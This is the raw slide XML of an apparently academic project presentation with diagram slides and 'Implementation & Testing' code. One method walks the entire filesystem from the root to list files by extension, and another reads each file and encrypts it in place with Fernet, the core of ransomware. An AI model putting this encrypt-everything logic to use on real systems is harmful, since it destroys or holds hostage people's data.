            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.3	Project Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Use case Diagram (Admin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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2778" y="1441856"/>
            <a:ext cx="5359228" cy="4802119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22928198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4287" y="267419"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.3	Project Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Use case Diagram (User)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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3820" y="1371599"/>
            <a:ext cx="5304360" cy="4860235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13924224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4287" y="267419"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.3	Project Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        Sequence Diagram(Admin)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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4635" b="5051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2842683" y="1070492"/>
            <a:ext cx="6730922" cy="5589100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24024989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4287" y="267419"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.3	Project Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        Sequence Diagram (User)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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642" t="154" r="4250" b="5053"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2851736" y="1070919"/>
            <a:ext cx="6712815" cy="5580047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1815939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xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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5" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291860" y="7010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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONTENTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301449" y="1211000"/>
            <a:ext cx="5695277" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>ABSTRACT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>1 INTRODUCTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>2 SYSTEM ANALYSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>3 ARCHITECTURAL DESIGN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>4 IMPLEMENTATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>5 RESULTS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>6 CONCLUSIONS AND FUTURE STUDY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>BIBLIOGRAPHY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3027882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4287" y="267419"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.3	Project Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        Activity Diagram (Admin)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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8" t="1107" r="7896" b="6061"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449180" y="1116993"/>
            <a:ext cx="5290336" cy="5305332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14006207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4287" y="267419"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.3	Project Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          Activity Diagram (User)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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6135" b="5173"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3036924" y="955886"/>
            <a:ext cx="5882961" cy="5807751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17573884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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Implementation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432758" y="1147147"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Coding block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>FindFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(self):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    f = open("logs/path.txt", "w")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        for root, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, files in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>os.walk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>("/"):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            # for root, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, files in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>os.walk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>("YOUR/TESTING/DIRECTORY"):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                if any(s in root for s in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>self.EXCLUDE_DIRECTORY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                    pass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                    for file in files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                        if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>file.endswith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>self.EXTENSIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                            TARGET = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>os.path.join</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(root, file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(TARGET+'\n')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                            print(root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>f.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1040272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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Implementation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432758" y="1147147"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Coding block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> Encrypt(self, filename):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Fernet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    with open(filename, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>") as file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>file_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>file.read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>encrypted_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>f.encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>file_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    with open(filename, "</a:t>
            </a:r>
